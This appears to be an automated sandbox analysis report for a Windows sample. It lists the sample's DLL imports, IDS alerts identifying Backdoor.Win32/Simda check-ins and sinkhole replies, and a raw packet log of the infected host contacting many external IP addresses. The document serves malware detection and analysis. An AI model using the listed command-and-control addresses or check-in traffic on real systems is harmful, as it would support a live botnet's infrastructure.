                                                                                                                                                                                                          user32.dllGetClassInfoA, LoadMenuIndirectA, CopyIcon, WinHelpA, EnumDesktopsA, SetActiveWindow, CreateDesktopA, GetSystemMetrics, CreatePopupMenu, BringWindowToTop, PeekMessageA, ClientToScreen, SetWindowRgn, GetDlgItemTextA, GetMenuInfo, GetClassLongA, IsMenu, FrameRect, LoadIconW, InsertMenuItemA, SetWindowLongW, GetFocus, GetCaretPos, DefWindowProcA, LoadBitmapW, EnumWindows, GetMenuStringW, MessageBoxIndirectA, EmptyClipboard, GetMenuItemID, GetWindowLongW, MonitorFromPoint, DestroyWindow, SetDlgItemTextW, CreateWindowExW, CharNextA, MessageBoxIndirectW, CreateAcceleratorTableA, GetDlgItemInt, SetCursor
                                                                                                                                                                                                          GDI32.DLLCreateEnhMetaFileW, GetMetaFileBitsEx, GetMapMode, CreateCompatibleBitmap, GetEnhMetaFileHeader, CreateBitmap, GetCharacterPlacementW, FrameRgn, SetSystemPaletteUse, GetCharABCWidthsFloatW, SelectObject, CreateDCA, CreateMetaFileW, SetBkColor, CreateFontW, ExtTextOutW, GetTextExtentExPointA, CreateScalableFontResourceW, EndDoc, CreateDIBitmap, GetEnhMetaFileDescriptionW
                                                                                                                                                                                                          ADVAPI32.DLLRegOpenKeyExA, RegDeleteKeyA, RegOpenKeyExW, RegOpenKeyW, RegDeleteValueA, RegDeleteKeyW, RegQueryValueA
                                                                                                                                                                                                          shell32.dllShell_NotifyIconA, StrRChrW, StrRChrIA
                                                                                                                                                                                                          oleaut32.dllVarI2FromBool, VarR8Round, OleCreatePictureIndirect, VarUI4FromStr, SafeArrayAllocData, LHashValOfNameSys, VarDecAbs
                                                                                                                                                                                                          OPENGL32.DLLglFogiv
                                                                                                                                                                                                          setupapi.dllpSetupDoesUserHavePrivilege
                                                                                                                                                                                                          WINMM.DLLmmioClose, waveOutGetNumDevs, midiInGetDevCapsA, mciGetDeviceIDW, waveOutGetDevCapsA, mixerGetLineInfoA, auxGetDevCapsW
                                                                                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                          EnglishUnited States
                                                                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                          2024-09-08T10:52:34.235689+02002021022ET MALWARE Wapack Labs Sinkhole DNS Reply11.1.1.153192.168.2.965460UDP
                                                                                                                                                                                                          2024-09-08T10:52:34.901041+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.94970944.221.84.10580TCP
                                                                                                                                                                                                          2024-09-08T10:52:34.935398+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.94971018.208.156.24880TCP
                                                                                                                                                                                                          2024-09-08T10:52:34.953925+02002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz144.221.84.10580192.168.2.949709TCP
                                                                                                                                                                                                          2024-09-08T10:52:34.953925+02002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst144.221.84.10580192.168.2.949709TCP
                                                                                                                                                                                                          2024-09-08T10:52:34.953983+02002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.208.156.24880192.168.2.949710TCP
                                                                                                                                                                                                          2024-09-08T10:52:34.953983+02002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.208.156.24880192.168.2.949710TCP
                                                                                                                                                                                                          2024-09-08T10:52:35.077856+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.949707188.114.96.380TCP
                                                                                                                                                                                                          2024-09-08T10:52:35.160440+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.949708162.255.119.10280TCP
                                                                                                                                                                                                          2024-09-08T10:52:35.218120+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.94971344.221.84.10580TCP
                                                                                                                                                                                                          2024-09-08T10:52:35.340682+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.9497143.94.10.3480TCP
                                                                                                                                                                                                          2024-09-08T10:52:35.347950+02002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz13.94.10.3480192.168.2.949714TCP
                                                                                                                                                                                                          2024-09-08T10:52:35.347950+02002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst13.94.10.3480192.168.2.949714TCP
                                                                                                                                                                                                          2024-09-08T10:52:35.348821+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.949715208.100.26.24580TCP
                                                                                                                                                                                                          2024-09-08T10:52:35.466063+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.949715208.100.26.24580TCP
                                                                                                                                                                                                          2024-09-08T10:52:35.489762+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.94971869.162.80.5580TCP
                                                                                                                                                                                                          2024-09-08T10:52:35.993021+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.949719154.212.231.8280TCP
                                                                                                                                                                                                          2024-09-08T10:52:36.043383+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.94972191.195.240.1980TCP
                                                                                                                                                                                                          2024-09-08T10:52:36.406724+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.949719154.212.231.8280TCP
                                                                                                                                                                                                          2024-09-08T10:52:36.987522+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.949720188.114.96.3443TCP
                                                                                                                                                                                                          2024-09-08T10:52:37.784848+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.949707188.114.96.380TCP
                                                                                                                                                                                                          2024-09-08T10:52:39.354524+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.949722188.114.96.3443TCP
                                                                                                                                                                                                          2024-09-08T10:52:55.915332+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.9497113.64.163.5080TCP
                                                                                                                                                                                                          2024-09-08T10:52:55.927081+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.9497123.64.163.5080TCP
                                                                                                                                                                                                          2024-09-08T10:52:56.243459+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.949716199.191.50.8380TCP
                                                                                                                                                                                                          2024-09-08T10:52:56.567233+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.9497253.64.163.5080TCP
                                                                                                                                                                                                          2024-09-08T10:53:05.537904+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.9497175.79.71.22580TCP
                                                                                                                                                                                                          2024-09-08T10:53:17.287065+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.9497243.64.163.5080TCP
                                                                                                                                                                                                          2024-09-08T10:53:17.614957+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.949726199.191.50.8380TCP
                                                                                                                                                                                                          2024-09-08T10:53:18.206596+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.94974213.248.169.4880TCP
                                                                                                                                                                                                          2024-09-08T10:53:18.390526+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.94974418.208.156.24880TCP
                                                                                                                                                                                                          2024-09-08T10:53:18.503660+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.949743188.114.96.380TCP
                                                                                                                                                                                                          2024-09-08T10:53:19.674486+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.949745103.150.11.23080TCP
                                                                                                                                                                                                          2024-09-08T10:53:20.317081+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.949746188.114.96.3443TCP
                                                                                                                                                                                                          2024-09-08T10:53:20.759479+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.949743188.114.96.380TCP
                                                                                                                                                                                                          2024-09-08T10:53:22.337908+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.949748188.114.96.3443TCP
                                                                                                                                                                                                          2024-09-08T10:53:27.240511+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.949745103.150.11.23080TCP
                                                                                                                                                                                                          2024-09-08T10:53:28.727515+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.94975064.225.91.7380TCP
                                                                                                                                                                                                          2024-09-08T10:53:28.777279+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.94975244.221.84.10580TCP
                                                                                                                                                                                                          2024-09-08T10:53:29.136128+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.949751154.85.183.5080TCP
                                                                                                                                                                                                          2024-09-08T10:53:29.450110+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.949751154.85.183.5080TCP
                                                                                                                                                                                                          2024-09-08T10:53:33.475195+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.960798103.224.212.10880TCP
                                                                                                                                                                                                          2024-09-08T10:53:34.223108+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.96079915.197.240.2080TCP
                                                                                                                                                                                                          2024-09-08T10:53:35.033352+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.960800103.224.182.25280TCP
                                                                                                                                                                                                          2024-09-08T10:53:39.253543+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.96330764.225.91.7380TCP
                                                                                                                                                                                                          2024-09-08T10:53:39.507371+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.96330872.52.179.17480TCP
                                                                                                                                                                                                          2024-09-08T10:53:40.017636+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.96330972.52.179.17480TCP
                                                                                                                                                                                                          2024-09-08T10:53:45.922151+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.96331052.34.198.22980TCP
                                                                                                                                                                                                          2024-09-08T10:53:45.930055+02002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz152.34.198.22980192.168.2.963310TCP
                                                                                                                                                                                                          2024-09-08T10:53:45.930055+02002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst152.34.198.22980192.168.2.963310TCP
                                                                                                                                                                                                          2024-09-08T10:53:49.707995+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.96331144.221.84.10580TCP
                                                                                                                                                                                                          2024-09-08T10:53:52.790598+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.95733469.162.80.5580TCP
                                                                                                                                                                                                          2024-09-08T10:53:52.821404+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.957338208.100.26.24580TCP
                                                                                                                                                                                                          2024-09-08T10:53:52.964495+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.9573403.64.163.5080TCP
                                                                                                                                                                                                          2024-09-08T10:53:52.970656+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.957338208.100.26.24580TCP
                                                                                                                                                                                                          2024-09-08T10:53:53.076727+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.957341162.255.119.10280TCP
                                                                                                                                                                                                          2024-09-08T10:53:53.286145+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.957337154.212.231.8280TCP
                                                                                                                                                                                                          2024-09-08T10:53:53.532245+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.957339188.114.96.380TCP
                                                                                                                                                                                                          2024-09-08T10:53:54.036670+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.95734291.195.240.1980TCP
                                                                                                                                                                                                          2024-09-08T10:53:54.166237+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.9573403.64.163.5080TCP
                                                                                                                                                                                                          2024-09-08T10:53:54.374430+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.957337154.212.231.8280TCP
                                                                                                                                                                                                          2024-09-08T10:53:55.450639+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.957343188.114.96.3443TCP
                                                                                                                                                                                                          2024-09-08T10:53:56.261258+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.957339188.114.96.380TCP
                                                                                                                                                                                                          2024-09-08T10:53:57.836691+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.957344188.114.96.3443TCP
                                                                                                                                                                                                          2024-09-08T10:54:00.277867+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.957335199.191.50.8380TCP
                                                                                                                                                                                                          2024-09-08T10:54:00.277979+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.9573363.64.163.5080TCP
                                                                                                                                                                                                          2024-09-08T10:54:03.918096+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.9573463.64.163.5080TCP
                                                                                                                                                                                                          2024-09-08T10:54:04.290312+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.957345199.191.50.8380TCP
                                                                                                                                                                                                          2024-09-08T10:54:05.110908+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.957347188.114.96.380TCP
                                                                                                                                                                                                          2024-09-08T10:54:05.958281+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.957348103.150.11.23080TCP
                                                                                                                                                                                                          2024-09-08T10:54:07.384794+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.957350188.114.96.3443TCP
                                                                                                                                                                                                          2024-09-08T10:54:07.728326+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.957347188.114.96.380TCP
                                                                                                                                                                                                          2024-09-08T10:54:09.400631+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.957351188.114.96.3443TCP
                                                                                                                                                                                                          2024-09-08T10:54:11.965932+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.957348103.150.11.23080TCP
                                                                                                                                                                                                          2024-09-08T10:54:12.974968+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.957352103.224.212.10880TCP
                                                                                                                                                                                                          2024-09-08T10:54:13.157273+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.957353103.224.182.25280TCP
                                                                                                                                                                                                          2024-09-08T10:54:13.490356+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.957354154.85.183.5080TCP
                                                                                                                                                                                                          2024-09-08T10:54:14.230499+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.957354154.85.183.5080TCP
                                                                                                                                                                                                          2024-09-08T10:54:17.755314+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.95705472.52.179.17480TCP
                                                                                                                                                                                                          2024-09-08T10:54:18.271431+02002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.95705572.52.179.17480TCP
                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.360619068 CEST4970780192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.365638018 CEST8049707188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.365720034 CEST4970780192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.369887114 CEST4970780192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.374701977 CEST8049707188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.421027899 CEST4970880192.168.2.9162.255.119.102
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.421993017 CEST4970980192.168.2.944.221.84.105
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.425983906 CEST8049708162.255.119.102192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.426054955 CEST4970880192.168.2.9162.255.119.102
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.426225901 CEST4970880192.168.2.9162.255.119.102
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.426817894 CEST804970944.221.84.105192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.426871061 CEST4970980192.168.2.944.221.84.105
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.427041054 CEST4970980192.168.2.944.221.84.105
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.431246996 CEST8049708162.255.119.102192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.431998014 CEST804970944.221.84.105192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.459820032 CEST4971080192.168.2.918.208.156.248
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.464641094 CEST804971018.208.156.248192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.464747906 CEST4971080192.168.2.918.208.156.248
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.479922056 CEST4971080192.168.2.918.208.156.248
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.484836102 CEST804971018.208.156.248192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.538285971 CEST4971180192.168.2.93.64.163.50
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.543314934 CEST80497113.64.163.50192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.543390036 CEST4971180192.168.2.93.64.163.50
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.543483973 CEST4971180192.168.2.93.64.163.50
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.548209906 CEST80497113.64.163.50192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.558552980 CEST4971280192.168.2.93.64.163.50
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.563515902 CEST80497123.64.163.50192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.563584089 CEST4971280192.168.2.93.64.163.50
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.563905954 CEST4971280192.168.2.93.64.163.50
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.570250988 CEST80497123.64.163.50192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.735649109 CEST4971380192.168.2.944.221.84.105
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.741044998 CEST804971344.221.84.105192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.741148949 CEST4971380192.168.2.944.221.84.105
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.741276026 CEST4971380192.168.2.944.221.84.105
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.746570110 CEST804971344.221.84.105192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.847342968 CEST4971480192.168.2.93.94.10.34
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.849884033 CEST4971580192.168.2.9208.100.26.245
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.851115942 CEST4971780192.168.2.95.79.71.225
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.851165056 CEST4971680192.168.2.9199.191.50.83
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.852269888 CEST80497143.94.10.34192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.852327108 CEST4971480192.168.2.93.94.10.34
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.853028059 CEST4971480192.168.2.93.94.10.34
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.858094931 CEST8049715208.100.26.245192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.858104944 CEST80497175.79.71.225192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.858114004 CEST8049716199.191.50.83192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.858155012 CEST4971580192.168.2.9208.100.26.245
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.858184099 CEST4971780192.168.2.95.79.71.225
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.858225107 CEST4971680192.168.2.9199.191.50.83
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.858284950 CEST4971580192.168.2.9208.100.26.245
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.858422995 CEST4971680192.168.2.9199.191.50.83
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.858458042 CEST4971780192.168.2.95.79.71.225
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.859314919 CEST80497143.94.10.34192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.864418030 CEST8049715208.100.26.245192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.864531994 CEST8049716199.191.50.83192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.864690065 CEST80497175.79.71.225192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.900964022 CEST804970944.221.84.105192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.901000977 CEST804970944.221.84.105192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.901041031 CEST4970980192.168.2.944.221.84.105
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.901070118 CEST4970980192.168.2.944.221.84.105
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.935336113 CEST804971018.208.156.248192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.935384035 CEST804971018.208.156.248192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.935398102 CEST4971080192.168.2.918.208.156.248
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.935452938 CEST4971080192.168.2.918.208.156.248
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.949003935 CEST4970980192.168.2.944.221.84.105
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.949224949 CEST4971080192.168.2.918.208.156.248
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.953924894 CEST804970944.221.84.105192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.953983068 CEST804971018.208.156.248192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.962979078 CEST4971880192.168.2.969.162.80.55
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.967824936 CEST804971869.162.80.55192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.968247890 CEST4971880192.168.2.969.162.80.55
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.968249083 CEST4971880192.168.2.969.162.80.55
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.973072052 CEST804971869.162.80.55192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.000375032 CEST4971980192.168.2.9154.212.231.82
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.005311012 CEST8049719154.212.231.82192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.005397081 CEST4971980192.168.2.9154.212.231.82
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.005671024 CEST4971980192.168.2.9154.212.231.82
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.010526896 CEST8049719154.212.231.82192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.077415943 CEST8049707188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.077856064 CEST4970780192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.160356998 CEST8049708162.255.119.102192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.160439968 CEST4970880192.168.2.9162.255.119.102
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.209353924 CEST8049707188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.209405899 CEST4970780192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.216675043 CEST49720443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.216722012 CEST44349720188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.216794014 CEST49720443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.218072891 CEST804971344.221.84.105192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.218120098 CEST4971380192.168.2.944.221.84.105
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.218188047 CEST804971344.221.84.105192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.218308926 CEST4971380192.168.2.944.221.84.105
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.223715067 CEST4971380192.168.2.944.221.84.105
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.228501081 CEST804971344.221.84.105192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.299966097 CEST49720443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.299988031 CEST44349720188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.340611935 CEST80497143.94.10.34192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.340634108 CEST80497143.94.10.34192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.340682030 CEST4971480192.168.2.93.94.10.34
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.343169928 CEST4971480192.168.2.93.94.10.34
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.347949982 CEST80497143.94.10.34192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.348762989 CEST8049715208.100.26.245192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.348820925 CEST4971580192.168.2.9208.100.26.245
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.349855900 CEST4971580192.168.2.9208.100.26.245
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.354747057 CEST8049715208.100.26.245192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.371463060 CEST4972180192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.376398087 CEST804972191.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.376463890 CEST4972180192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.376718044 CEST4972180192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.381448030 CEST804972191.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.465914011 CEST8049715208.100.26.245192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.466063023 CEST4971580192.168.2.9208.100.26.245
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.489614964 CEST804971869.162.80.55192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.489762068 CEST4971880192.168.2.969.162.80.55
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.489762068 CEST4971880192.168.2.969.162.80.55
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.490021944 CEST804971869.162.80.55192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.490129948 CEST4971880192.168.2.969.162.80.55
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.494574070 CEST804971869.162.80.55192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.778433084 CEST44349720188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.778804064 CEST49720443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.867319107 CEST49720443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.867351055 CEST44349720188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.867752075 CEST44349720188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.868098021 CEST49720443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.883246899 CEST49720443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.928502083 CEST44349720188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.992845058 CEST8049719154.212.231.82192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.993021011 CEST4971980192.168.2.9154.212.231.82
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.994051933 CEST4971980192.168.2.9154.212.231.82
                                                                                                                                                                                                          Sep 8, 2024 10:52:35.998943090 CEST8049719154.212.231.82192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.043301105 CEST804972191.195.240.19192.168.2.9
